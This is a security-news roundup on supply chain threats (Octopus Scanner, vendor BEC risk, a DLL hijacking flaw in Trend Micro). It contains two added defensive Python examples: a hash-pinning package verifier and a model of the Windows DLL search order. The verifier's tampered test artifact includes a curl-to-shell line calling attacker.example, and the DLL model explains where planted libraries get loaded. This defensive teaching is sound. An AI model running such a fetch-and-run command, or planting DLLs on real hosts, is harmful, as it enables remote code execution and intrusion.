Security News
GitHub revealed on Thursday that tens of open source NetBeans projects hosted on its platform were targeted by a piece of malware as part of what appears to be a supply chain attack. GitHub learned about the malware, which has been named Octopus Scanner, on March 9 from a security researcher who noticed that several repositories hosted on GitHub had been serving malware, likely without their owners' knowledge.
This unprecedented access gives organizations the ability to see detailed views of all vendors, including profile information, the VendorBase risk assessment score, explanations of those risk scores, and a timeline view of relevant email communication and security activity for that vendor. "Before VendorBase, organizations lacked clear visibility of the BEC risk from their supply chains. This new capability greatly mitigates this risk and makes it much easier for organizations to directly remediate and investigate BEC attacks from compromised vendors."
Researchers have trawled the dark web to see how the underground is responding to the COVID-19 pandemic. Researchers from Trustwave have found that the underground mirrors the overground - some people seek to make money from the crisis, others ignore it, and still others offer genuine help, information and advice to forum members.
"Technology adoption has skyrocketed in virtually every segment of our agriculture sector including food production, processing, and distribution," comments Parham Eftekhari, founder and chairman of the Institute for Critical Infrastructure Technology, "And experts predict this trend to continue with robotics and self-driving freight carriers paving the way for an autonomous future. This creates significant opportunity for disruption to our supply chain and food safety concerns." He continued, "Today, we are already hearing stories of processing plants shutting down and the potential of food shortages. What if manufacturing and storage facilities of perishable food products have their cooling systems hacked during a time of a national food shortage? It would only take a handful of high-profile attacks to create panic among citizens that could lead to a rush on grocery stores and threaten an already fragile food supply."
Billions of data points are gathered throughout the UPS network every week. Find out how the information collected is revolutionizing the logistics giant.
Rather than reinventing the wheel by writing their own code to handle common tasks, developers write it once as a software package and upload it to a public repository. These repositories contain thousands of packages for other developers to download. The upside is that it accelerates software development; the downside is that every downloaded package is code written by someone else and run with the privileges of the project that installs it.
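The check a practitioner applies before trusting a package pulled from such a repository is to pin each dependency to an exact version and a digest recorded when the package was vetted, and to refuse anything that does not match. The block below is an added example, not code from the article or from any package manager; it re-implements the logic behind pip's hash-checking mode (`--require-hashes`) on a constructed requirements file and constructed artifact bytes so the behaviour is visible offline. The package name `leftpad`, the artifact contents and the file layout are all invented for the illustration.

```python
"""Verify downloaded package artifacts against hash pins.

Added example, not code from the original article or from any package
repository. It re-implements the check pip performs with --require-hashes:
every requirement must be pinned to an exact version and at least one strong
digest, and a downloaded artifact is accepted only if its digest matches.
"""
import hashlib
import hmac
import re

STRONG_ALGORITHMS = {"sha256", "sha384", "sha512"}

# One pinned requirement, e.g. "requests==2.25.1 --hash=sha256:abc...".
# Line-continuation backslashes are folded away before matching.
_REQ_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>\S+)"
    r"(?P<hashes>(?:\s+--hash=[a-z0-9]+:[0-9a-fA-F]+)+)\s*$"
)
_HASH_RE = re.compile(r"--hash=(?P<alg>[a-z0-9]+):(?P<hex>[0-9a-fA-F]+)")


def parse_requirements(text):
    """Return {name: (version, {alg: {hexdigest, ...}})} for each requirement.

    Raises ValueError if a requirement is unpinned, carries no hash, or uses a
    weak algorithm, mirroring pip's refusal to proceed in hash-checking mode.
    """
    pins = {}
    folded = text.replace("\\\n", " ")
    for raw in folded.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = _REQ_RE.match(line)
        if not m:
            raise ValueError(f"not pinned with ==version and --hash: {line!r}")
        digests = {}
        for h in _HASH_RE.finditer(m.group("hashes")):
            alg = h.group("alg")
            if alg not in STRONG_ALGORITHMS:
                raise ValueError(f"weak or unknown hash algorithm {alg!r} for {m.group('name')}")
            digests.setdefault(alg, set()).add(h.group("hex").lower())
        pins[m.group("name").lower()] = (m.group("version"), digests)
    return pins


def verify_artifact(name, version, data, pins):
    """True only if `data` (the downloaded archive bytes) matches a pin for name==version."""
    entry = pins.get(name.lower())
    if entry is None or entry[0] != version:
        return False          # unknown package or a version nobody vetted
    _, digests = entry
    for alg, expected_set in digests.items():
        actual = hashlib.new(alg, data).hexdigest()
        for expected in expected_set:
            if hmac.compare_digest(actual, expected):
                return True
    return False


# Constructed sample artifacts: the upload that was vetted when the pin was
# taken, and a tampered re-upload under the same name and version.
GOOD_ARTIFACT = b"PK\x03\x04 fake-wheel: def leftpad(s, n): return s.rjust(n)\n"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"import os; os.system('curl http://attacker.example/x | sh')\n"

# The pin a developer records (e.g. with `pip hash`) after reviewing the package.
GOOD_SHA256 = hashlib.sha256(GOOD_ARTIFACT).hexdigest()

REQUIREMENTS_TXT = f"""\
# constructed requirements file with hash pinning
leftpad==1.0.0 \\
    --hash=sha256:{GOOD_SHA256}
"""


def demo():
    """(vetted artifact accepted, tampered artifact rejected, unpinned version rejected)."""
    pins = parse_requirements(REQUIREMENTS_TXT)
    return (
        verify_artifact("leftpad", "1.0.0", GOOD_ARTIFACT, pins),
        verify_artifact("leftpad", "1.0.0", TAMPERED_ARTIFACT, pins),
        verify_artifact("leftpad", "1.0.1", GOOD_ARTIFACT, pins),
    )


if __name__ == "__main__":
    print(demo())  # (True, False, False)
```

The important property is that a new upload of the same name and version, which is exactly what a compromised maintainer account or a hijacked repository produces, fails the check rather than silently replacing the vetted code; the weak-algorithm and unpinned-version rejections close the two common ways such a check gets hollowed out.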
As a result, there are real consequences including loss of revenue, loss of productivity, and loss of reputation - all of which can jeopardize resiliency and are amplified given today's supply chain concerns related to COVID-19. "Organizations are starting to ask the question about what happens to them if their supply chain partners go out of business. Sadly, most companies don't have the risk visibility into their supply chains to answer that question," stated Brenda Ferraro, VP of third-party risk at Prevalent.
During 2019 a SafeBreach research team discovered major vulnerabilities in widely used security products that were written and tested by reputable cybersecurity companies.

Product: Trend Micro Maximum Security 2019 and 2020
What can happen: DLL search-order hijacking; signed-execution whitelisting bypass
Underlying flaws: Uncontrolled search path; no digital certificate validation against the binary
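The two flaws listed above combine in a familiar way: a product loads a DLL by bare name, so Windows walks its default search order, and because the product never validates the loaded file's certificate, a DLL planted in any user-writable directory that is searched before the legitimate one runs inside the product's signed, whitelisted process. The block below is an added example, not SafeBreach's research code and not anything from Trend Micro. It models the default Windows search order (SafeDllSearchMode enabled) over a constructed inventory of directories, their writability and the signer of each file, which is the data an auditor would collect on a real host with `icacls` and `Get-AuthenticodeSignature`; the product name `ExampleAV`, the directories, the DLL names and the signer strings are all invented for the illustration. The hardened resolver at the end shows the two fixes the flaws call for: load from one explicit directory only, and check the signer before loading.

```python
"""Model the Windows DLL search order to flag hijackable loads.

Added example, not SafeBreach's research code and not Trend Micro's. It
assumes the default search order with SafeDllSearchMode enabled and takes a
constructed inventory of directories (which ones an unprivileged user can
write to, which files they hold and who signed them).
"""
from dataclasses import dataclass, field


@dataclass
class Directory:
    path: str
    user_writable: bool                         # can an unprivileged user create files here?
    files: dict = field(default_factory=dict)   # lowercase filename -> signer, or None if unsigned


def default_search_order(app_dir, cwd, path_dirs, windir=r"C:\Windows"):
    """Directories LoadLibrary("name.dll") walks when given only a file name.

    With SafeDllSearchMode on (the default): application directory, System32,
    the 16-bit System directory, the Windows directory, the current
    directory, then each PATH entry in order.
    """
    return [app_dir, windir + r"\System32", windir + r"\System", windir, cwd] + list(path_dirs)


def resolve_by_name(dll, order, inventory):
    """(directory, signer) of the first hit, as an unqualified load would pick it."""
    for d in order:
        entry = inventory.get(d)
        if entry is not None and dll.lower() in entry.files:
            return d, entry.files[dll.lower()]
    return None, None


def hijack_findings(dll, order, inventory, expected_signer):
    """Explain how an unprivileged user could get their DLL loaded for this search.

    Walks the order until the DLL is found. Every user-writable directory
    passed on the way is a planting point; a DLL found with the wrong (or no)
    signer is an already-hijacked load; a DLL found nowhere is the missing-DLL
    case in which every writable directory on the path wins.
    """
    findings = []
    name = dll.lower()
    for d in order:
        entry = inventory.get(d)
        if entry is None:
            continue  # directory does not exist on this host
        if name in entry.files:
            signer = entry.files[name]
            if signer != expected_signer:
                findings.append(f"{d}: {dll} present but signed by {signer!r}, expected {expected_signer!r}")
            return findings  # the search stops at the first hit
        if entry.user_writable:
            findings.append(f"{d}: searched before {dll} is found and user-writable")
    findings.append(f"{dll} not found anywhere: every writable directory above is a planting point")
    return findings


def resolve_hardened(dll, trusted_dir, inventory, expected_signer):
    """Load only from one explicit directory and only if the signer matches.

    On a real host this corresponds to passing a full path, or LoadLibraryEx
    with LOAD_LIBRARY_SEARCH_SYSTEM32 / LOAD_LIBRARY_SEARCH_APPLICATION_DIR,
    plus an Authenticode check of the file before it is mapped.
    """
    entry = inventory.get(trusted_dir)
    if entry is None or dll.lower() not in entry.files:
        raise FileNotFoundError(f"{dll} is not in {trusted_dir}; refusing to search elsewhere")
    signer = entry.files[dll.lower()]
    if signer != expected_signer:
        raise PermissionError(f"{trusted_dir}\\{dll} signed by {signer!r}, expected {expected_signer!r}")
    return trusted_dir + "\\" + dll


# Constructed host inventory (illustrative paths, not a real product layout).
APP_DIR = r"C:\Program Files\ExampleAV"
VENDOR = "Example AV Vendor"
INVENTORY = {d.path: d for d in [
    Directory(APP_DIR, user_writable=False, files={"core.dll": VENDOR}),
    Directory(r"C:\Windows\System32", user_writable=False, files={"kernel32.dll": "Microsoft Windows"}),
    Directory(r"C:\Windows", user_writable=False),
    Directory(r"C:\Users\alice\Downloads", user_writable=True),
    Directory(r"C:\Tools", user_writable=True, files={"helper.dll": None}),  # planted, unsigned
]}
ORDER = default_search_order(APP_DIR, cwd=r"C:\Users\alice\Downloads", path_dirs=[r"C:\Tools"])


def demo():
    """What LoadLibrary("helper.dll") would pick, why it is hijackable, and what the hardened loader does."""
    loaded = resolve_by_name("helper.dll", ORDER, INVENTORY)
    findings = hijack_findings("helper.dll", ORDER, INVENTORY, VENDOR)
    try:
        hardened = resolve_hardened("helper.dll", APP_DIR, INVENTORY, VENDOR)
    except (FileNotFoundError, PermissionError) as exc:
        hardened = f"refused: {exc}"
    return loaded, findings, hardened


if __name__ == "__main__":
    for item in demo():
        print(item)
```

In the constructed scenario the product ships no `helper.dll` of its own, so the bare-name load walks past the user-writable Downloads directory and ends up loading the unsigned copy from `C:\Tools` on PATH; the hardened loader refuses because the file is not in the application directory, and even a copy placed there would be rejected unless its signer matched the vendor's.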
Cybersecurity incidents are also a grave problem for companies across global supply chains as more enterprises adopt digitized management systems. A new report from supply chain company Resilience360 goes into detail about the cyberthreats facing supply chains in 2020 and the bevy of incidents that occurred throughout 2019.
How can the use of "Smart contracts" based on distributed ledger technology help improve the overall security picture for evolving healthcare sector supply chains? Mitch Parker, CISO of Indiana University Health, explains. "Smart contracts are pieces of executable code that can run as part of a distributed ledger technology system, and they're relevant to healthcare supply chain because a lot of the [newer] enterprise planning resource systems we're putting in actually support those as a way of doing data interchange," says Parker in an interview with Information Security Media Group.